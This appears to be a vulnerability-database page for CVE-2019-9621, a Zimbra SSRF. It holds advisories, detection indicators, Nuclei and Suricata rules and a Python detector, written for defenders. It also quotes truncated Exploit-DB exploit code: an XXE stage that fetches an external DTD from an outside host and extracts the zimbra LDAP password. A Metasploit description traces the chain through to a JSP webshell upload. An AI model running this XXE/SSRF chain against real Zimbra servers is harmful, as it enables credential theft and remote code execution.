CVE-2019-9621
Published 2019-04-30
CVE-2019-9621: Zimbra Collaboration Suite before 8.6 patch 13, 8.7.x before 8.7.11 patch 10, and 8.8.x before 8.8.10 patch 7 or 8.8.x before 8.8.11 patch 3 allows SSRF via…
Priority: P190 high · CVSS 3.1: 7.5
CVSS vector: AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
KEV · ITW · EXPLOIT · Initial access
CISA Known Exploited Vulnerability, due 2025-07-28
Exploited in the wild
EPSS: 80.91% (99.6th percentile)
Zimbra Collaboration Suite before 8.6 patch 13, 8.7.x before 8.7.11 patch 10, and 8.8.x before 8.8.10 patch 7 or 8.8.x before 8.8.11 patch 3 allows SSRF via the ProxyServlet component.
Affected (8 ranges)
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| synacor | zimbra_collaboration_suite | < 8.6.0 | 8.6.0 |
| synacor | zimbra_collaboration_suite | — | — |
| synacor | zimbra_collaboration_suite | — | — |
| synacor | zimbra_collaboration_suite | — | — |
| synacor | zimbra_collaboration_suite | — | — |
| synacor | zimbra_collaboration_suite | — | — |
| synacor | zimbra_collaboration_suite | >= 8.7.0 < 8.7.11 | 8.7.11 |
| synacor | zimbra_collaboration_suite | >= 8.8.0 < 8.8.9 | 8.8.9 |
Detection & IOCs (extracted from sources)
Nuclei template matcher (DSL):
regex('root:.*:0:0:', body) and contains(body, "response schema") and contains(header, "text/html")
Indicators
- Detect exploitation attempts by monitoring POST requests to /autodiscover or /Autodiscover/Autodiscover.xml with XML bodies containing external entity (XXE) declarations (DOCTYPE with SYSTEM or external DTD references).
- Detect SSRF exploitation by monitoring POST requests to /service/proxy/ (or /service/proxy?target=) where the target parameter points to internal addresses such as 127.0.0.1:7071.
- Alert on POST requests to /service/extension/clientUploader/upload bearing a ZM_ADMIN_AUTH_TOKEN cookie, which indicates the webshell upload stage of the exploit chain.
- Monitor HTTP Host header manipulation: the exploit sends a Host header set to an internal port (e.g., foo:7071) to abuse the ProxyServlet SSRF.
- Use a Shodan query to identify exposed Zimbra instances: html:"Zimbra Collaboration Suite Web Client"
- Successful XXE exploitation returns content matching root:.*:0:0: (passwd file) in the HTTP response body; monitor for this pattern in Zimbra autodiscover responses.
- Monitor for JSP webshell files appearing under the Zimbra /downloads/ path following a clientUploader upload request.
Caveats
- The SSRF exploit requires a prior XXE step (CVE-2019-9670) to extract the zimbra LDAP password; detections should account for the full chained attack sequence, not just the SSRF in isolation.
- The Metasploit module defaults to SSL on port 8443; detection rules targeting plain HTTP on port 80 may miss exploit traffic.
- The module temporarily disables SSL during the XXE stage (datastore['SSL'] = false) before re-enabling it, so both HTTP and HTTPS traffic should be inspected.
- The exploit uses a random-length alpha-lower string for the JSP webshell filename, so static filename-based detection will not reliably catch the uploaded shell.
- The Nuclei template matcher requires all three conditions simultaneously (passwd regex match, 'response schema' in body, text/html in header); partial matches alone are insufficient for confident detection.
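The indicators and caveats above can be turned into a small offline detector. The following is an added example written for this record; it is not code from the page, from Zimbra, Nuclei, Metasploit or any other project. It applies the request-side indicators (Autodiscover bodies carrying an external DTD or parameter entity, ProxyServlet targets on non-global hosts or port 7071, a Host header pointing at port 7071, clientUploader uploads with an admin cookie) and the response-side three-condition Nuclei-style matcher to constructed HTTP records. The record layout, the function names and every sample value are assumptions.

```python
# Added example, not the page's or any vendor's code. Detects the request- and
# response-side indicators listed for CVE-2019-9621 over constructed records.
import re
from dataclasses import dataclass, field
from ipaddress import ip_address
from typing import Dict, List
from urllib.parse import parse_qs, urlsplit


@dataclass
class HttpRequest:
    method: str
    url: str                                  # path plus optional query string
    headers: Dict[str, str] = field(default_factory=dict)
    body: str = ""


@dataclass
class HttpResponse:
    headers: Dict[str, str] = field(default_factory=dict)
    body: str = ""


# DOCTYPE pulling in an external DTD (SYSTEM/PUBLIC) or expanding a parameter
# entity: the XXE shape the indicator list describes.
XXE_DECL = re.compile(r"<!DOCTYPE\b[^>]*?(?:\bSYSTEM\b|\bPUBLIC\b|%\s*\w+;)", re.I | re.S)
PASSWD_ROOT = re.compile(r"root:.*:0:0:")     # same regex as the Nuclei matcher
ADMIN_PORT = 7071                             # Zimbra admin port named in the indicators


def _headers_lower(headers: Dict[str, str]) -> Dict[str, str]:
    return {k.lower(): v for k, v in headers.items()}


def is_internal_target(target: str) -> bool:
    """True when a proxy target names a non-global IP, localhost, or the admin port."""
    parts = urlsplit(target if "://" in target else "//" + target)
    host = (parts.hostname or "").lower()
    try:
        port = parts.port
    except ValueError:
        port = None
    try:
        if not ip_address(host).is_global:
            return True
    except ValueError:
        pass  # not an IP literal; fall through to the name/port checks
    return host == "localhost" or port == ADMIN_PORT


def classify_request(req: HttpRequest) -> List[str]:
    """Return the names of the indicators one request matches (empty if none)."""
    findings: List[str] = []
    if req.method.upper() != "POST":
        return findings
    h = _headers_lower(req.headers)
    parts = urlsplit(req.url)
    path = parts.path.lower().rstrip("/")
    if path in ("/autodiscover", "/autodiscover/autodiscover.xml") and XXE_DECL.search(req.body):
        findings.append("xxe-autodiscover")
    if path.startswith("/service/proxy"):
        target = parse_qs(parts.query).get("target", [""])[0]
        if target and is_internal_target(target):
            findings.append("ssrf-proxyservlet")
    if h.get("host", "").rsplit(":", 1)[-1] == str(ADMIN_PORT):
        findings.append("host-header-admin-port")
    if path == "/service/extension/clientuploader/upload" and "zm_admin_auth_token=" in h.get("cookie", "").lower():
        findings.append("admin-webshell-upload")
    return findings


def nuclei_style_match(resp: HttpResponse) -> bool:
    """All three conditions of the quoted matcher must hold at once."""
    header_blob = "\n".join(f"{k}: {v}" for k, v in resp.headers.items()).lower()
    return (bool(PASSWD_ROOT.search(resp.body))
            and "response schema" in resp.body
            and "text/html" in header_blob)


# Constructed sample traffic (not real captures); hostnames and cookies are placeholders.
SAMPLE_REQUESTS = [
    HttpRequest("POST", "/Autodiscover/Autodiscover.xml", {"Host": "mail.example.test", "Content-Type": "application/xml"},
                '<?xml version="1.0"?><!DOCTYPE Autodiscover SYSTEM "http://dtd-host.example/x.dtd"><Autodiscover/>'),
    HttpRequest("POST", "/service/proxy?target=https://127.0.0.1:7071/service/admin/soap",
                {"Host": "mail.example.test", "Cookie": "ZM_AUTH_TOKEN=placeholder"}, "<soap/>"),
    HttpRequest("POST", "/service/proxy/?target=https://foo:7071/service/admin/soap", {"Host": "foo:7071"}, "<soap/>"),
    HttpRequest("POST", "/service/extension/clientUploader/upload",
                {"Host": "mail.example.test", "Cookie": "ZM_ADMIN_AUTH_TOKEN=placeholder"}, "(multipart body)"),
    HttpRequest("POST", "/service/soap", {"Host": "mail.example.test"}, "<AuthRequest/>"),  # benign
]
SAMPLE_RESPONSES = [
    HttpResponse({"Content-Type": "text/html;charset=UTF-8"}, "response schema not available\nroot:x:0:0:root:/root:/bin/bash\n"),
    HttpResponse({"Content-Type": "text/html"}, "response schema not available"),  # no leaked passwd line
]


def scan(requests=SAMPLE_REQUESTS, responses=SAMPLE_RESPONSES) -> Dict[str, list]:
    """Run both detectors and return the hits as a JSON-friendly dict."""
    return {"requests": [classify_request(r) for r in requests],
            "responses": [nuclei_style_match(r) for r in responses]}


if __name__ == "__main__":
    result = scan()
    for i, hits in enumerate(result["requests"]):
        print(f"request {i}: {hits or 'clean'}")
    for i, hit in enumerate(result["responses"]):
        print(f"response {i}: {'matched' if hit else 'no match'}")
```

The request rules deliberately fire only on POST, as the indicator list states, and the proxy check accepts both `/service/proxy` and `/service/proxy/` plus URL-encoded target values (parse_qs unquotes them). Because the caveats note that the webshell filename is random, no filename pattern is checked here; the upload stage is caught by path plus admin cookie instead.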
CVSS provenance
- nvd (v3.1): 7.5 HIGH · CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
- nvd (v2.0): 5.0 MEDIUM · AV:N/AC:L/Au:N/C:P/I:N/A:N
- vulncheck: 7.5 HIGH
- cisa: 7.5 HIGH
CISA
Synacor Zimbra Collaboration Suite (ZCS) Server-Side Request Forgery (SSRF) Vulnerability
cisa·2025-07-07·CVSS 7.5
CVE-2019-9621 [HIGH] CWE-918 Synacor Zimbra Collaboration Suite (ZCS) Server-Side Request Forgery (SSRF) Vulnerability
Vulnerability: Synacor Zimbra Collaboration Suite (ZCS) Server-Side Request Forgery (SSRF) Vulnerability
Affected: Synacor Zimbra Collaboration Suite (ZCS)
Synacor Zimbra Collaboration Suite (ZCS) contains a server-side request forgery (SSRF) vulnerability via the ProxyServlet component.
Required Action: Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable.
Notes: https://wiki.zimbra.com/wiki/Zimbra_Security_Advisories ; https://wiki.zimbra.com/wiki/Security_Center ; https://nvd.nist.gov/vuln/detail/CVE-2019-9621
Remediation Due Date: 2025-07-28
GHSA
GHSA-gf2h-5qx6-v9fr: Zimbra Collaboration Suite before 8
ghsa_unreviewed·2022-05-24
CVE-2019-9621 [HIGH] CWE-918 GHSA-gf2h-5qx6-v9fr: Zimbra Collaboration Suite before 8
Zimbra Collaboration Suite before 8.6 patch 13, 8.7.x before 8.7.11 patch 10, and 8.8.x before 8.8.10 patch 7 or 8.8.x before 8.8.11 patch 3 allows SSRF via the ProxyServlet component.
VulnCheck
Synacor Zimbra Collaboration Suite (ZCS) Server-Side Request Forgery (SSRF) Vulnerability
vulncheck·2019·CVSS 7.5
CVE-2019-9621 [HIGH] CWE-918 Synacor Zimbra Collaboration Suite (ZCS) Server-Side Request Forgery (SSRF) Vulnerability
Synacor Zimbra Collaboration Suite (ZCS) Server-Side Request Forgery (SSRF) Vulnerability
Synacor Zimbra Collaboration Suite (ZCS) contains a server-side request forgery (SSRF) vulnerability via the ProxyServlet component.
Affected: Synacor Zimbra Collaboration Suite (ZCS)
Required Action: Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable.
Exploitation References: https://www.trendmicro.com/en_us/research/23/i/earth-lusca-employs-new-linux-backdoor.html; https://ics-cert.kaspersky.com/publications/reports/2025/03/25/apt-and-financial-attacks-on-industrial-organizations-in-q4-2024/; https://www.cisa.gov/sites/default/files/feeds/known_exploited_vulnerabilities.json; https:/
Suricata
ET EXPLOIT Zimbra <8.8.11 - XML External Entity Injection/SSRF Attempt (CVE-2019-9621)
suricata·2021-01-27·CVSS 7.5
CVE-2019-9621 [HIGH] ET EXPLOIT Zimbra <8.8.11 - XML External Entity Injection/SSRF Attempt (CVE-2019-9621)
ET EXPLOIT Zimbra $HOME_NET any (msg:"ET EXPLOIT Zimbra "; content:""; reference:url,www.exploit-db.com/exploits/46967; reference:url,packetstormsecurity.com/files/152487/Zimbra-Collaboration-Autodiscover-Servlet-XXE-ProxyServlet-SSRF.html; reference:cve,2019-9621; reference:cve,2021-2109; classtype:attempted-user; sid:2031562; rev:1; metadata:affected_product Web_Server_Applications, attack_target Client_Endpoint, created_at 2021_01_27, cve CVE_2021_2109, deployment Perimeter, confidence Medium, signature_severity Major, updated_at 2021_01_27;)
Exploit-DB
Zimbra < 8.8.11 - XML External Entity Injection / Server-Side Request Forgery
exploitdb·2019-06-05
CVE-2019-9621 Zimbra < 8.8.11 - XML External Entity Injection / Server-Side Request Forgery
Zimbra |");int c;while ((c = in.read()) != -1) {out.print((char)c);}in.close();out.print("|'
print(base_url)
#dtd file url
dtd_url="https://k8gege.github.io/zimbra.dtd"
"""
">
">
"""
xxe_data = r"""
%dtd;
%all;
]>
aaaaa
&fileContents;
""".format(dtd=dtd_url)
#XXE stage
headers = {
"Content-Type":"application/xml"
}
print("[*] Get User Name/Password By XXE ")
r = requests.post(base_url+"/Autodiscover/Autodiscover.xml",data=xxe_data,headers=headers,verify=False,timeout=15)
#print r.text
if 'response schema not available' not in r.text:
print("have no xxe")
exit()
#low_token Stage
import re
pattern_name = re.compile(r"\n.*?(.*?)")
pattern_password = re.compile(r"\n.*?(.*?)")
username = pattern_name.findall(r.text)[0][2]
password = pattern_password.findall(r.text)[0][2]
print(username)
Exploit-DB
Zimbra Collaboration - Autodiscover Servlet XXE and ProxyServlet SSRF (Metasploit)
exploitdb·2019-04-12
CVE-2019-9670 Zimbra Collaboration - Autodiscover Servlet XXE and ProxyServlet SSRF (Metasploit)
Zimbra Collaboration - Autodiscover Servlet XXE and ProxyServlet SSRF (Metasploit)
---
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule 'Zimbra Collaboration Autodiscover Servlet XXE and ProxyServlet SSRF',
'Description' => %q{
This module exploits an XML external entity vulnerability and a
server side request forgery to get unauthenticated code execution
on Zimbra Collaboration Suite. The XML external entity vulnerability
in the Autodiscover Servlet is used to read a Zimbra configuration
file that contains an LDAP password for the 'zimbra' account. The
zimbra credentials are then used to get a user authentication cookie
with an AuthRequest message. Using the user cookie, a se
Metasploit
Zimbra Collaboration Autodiscover Servlet XXE and ProxyServlet SSRF
metasploit
Zimbra Collaboration Autodiscover Servlet XXE and ProxyServlet SSRF
Zimbra Collaboration Autodiscover Servlet XXE and ProxyServlet SSRF
This module exploits an XML external entity vulnerability and a server side request forgery to get unauthenticated code execution on Zimbra Collaboration Suite. The XML external entity vulnerability in the Autodiscover Servlet is used to read a Zimbra configuration file that contains an LDAP password for the 'zimbra' account. The zimbra credentials are then used to get a user authentication cookie with an AuthRequest message. Using the user cookie, a server side request forgery in the Proxy Servlet is used to proxy an AuthRequest with the 'zimbra' credentials to the admin port to retrieve an admin cookie. After gaining an admin cookie the Client Upload servlet is used to upload a JSP webshell that can be triggered from th
Nuclei
Zimbra Collaboration Suite - SSRF
nuclei·CVSS 7.5
CVE-2019-9621 [HIGH] Zimbra Collaboration Suite - SSRF
Zimbra Collaboration Suite - SSRF
Zimbra Collaboration Suite before 8.6 patch 13, 8.7.x before 8.7.11 patch 10, and 8.8.x before 8.8.10 patch 7 or 8.8.x before 8.8.11 patch 3 allows SSRF via the ProxyServlet component.
Template:
id: CVE-2019-9621
info:
  name: Zimbra Collaboration Suite - SSRF
  author: riteshs4hu
  severity: high
  description: |
    Zimbra Collaboration Suite before 8.6 patch 13, 8.7.x before 8.7.11 patch 10, and 8.8.x before 8.8.10 patch 7 or 8.8.x before 8.8.11 patch 3 allows SSRF via the ProxyServlet component.
  impact: |
    Attackers can perform SSRF, potentially leading to internal network access or further exploitation.
  remediation: |
    Update to the latest patched versions: 8.6 patch 13, 8.7.11 patch 10, 8.8.10 patch 7, or 8.8.11 patch 3 or later.
  reference:
    - https://github.co
Trendmicro
Earth Lusca Employs New Linux Backdoor, Uses Cobalt Strike for Lateral Movement
blogs_trendmicro·2023-09-18
Earth Lusca Employs New Linux Backdoor, Uses Cobalt Strike for Lateral Movement
Malware
## Earth Lusca Employs New Linux Backdoor, Uses Cobalt Strike for Lateral Movement
While monitoring Earth Lusca, we discovered an intriguing, encrypted file on the threat actor's server — a Linux-based malware, which appears to originate from the open-source Windows backdoor Trochilus, which we've dubbed SprySOCKS due to its swift behavior and SOCKS implementation.
By: Joseph C Chen · 2023/09/18
In early 2021, we published a research paper discussing the operation of a China-linked threat actor we tracked as Earth Lusca. Since our initial research, the group has remained active and has even extended its operations, targeting countries around the world during the first half of 2023.
While monitoring the group, we managed to obtain an interestin
Fortinet
Deconstructing an Evasive Formbook Campaign Leveraging COVID-19 Themes | FortiGuard Labs
blogs_fortinet·2020-04-21
Deconstructing an Evasive Formbook Campaign Leveraging COVID-19 Themes | FortiGuard Labs
FORTIGUARD LABS THREAT RESEARCH
Deconstructing an Evasive Formbook Campaign Leveraging COVID-19 Themes
By Fred Gutierrez and Val Saengphaibul | April 21, 2020
FortiGuard Labs Threat Analysis Report
Introduction
Affected platforms: Windows
Impacted parties: Companies that engage with biomedical firms
Impact: Remote control of infected computer, information stealing, keylogger
Severity level: High
During our research into COVID-19 threats, FortiGuard Labs has run into a number of unique types of spearphishing lures. For example, one of these targets companies that engage with biomedical firms, and as a result, they may be at risk of losing financial resources, data, or intellectual property.
Within the last couple of days, for example, our spam traps noticed the following email sent ou
References
- http://packetstormsecurity.com/files/152487/Zimbra-Collaboration-Autodiscover-Servlet-XXE-ProxyServlet-SSRF.html
- http://packetstormsecurity.com/files/153190/Zimbra-XML-Injection-Server-Side-Request-Forgery.html
- http://www.rapid7.com/db/modules/exploit/linux/http/zimbra_xxe_rce
- https://blog.tint0.com/2019/03/a-saga-of-code-executions-on-zimbra.html
- https://blog.zimbra.com/2019/03/9826/
- https://bugzilla.zimbra.com/show_bug.cgi?id=109127
- https://wiki.zimbra.com/wiki/Security_Center
- https://wiki.zimbra.com/wiki/Zimbra_Security_Advisories
- https://www.exploit-db.com/exploits/46693/
- https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2019-9621
Timeline
- 2019-04-30: Published
- 2025-07-07: Added to CISA KEV
- Exploited in the wild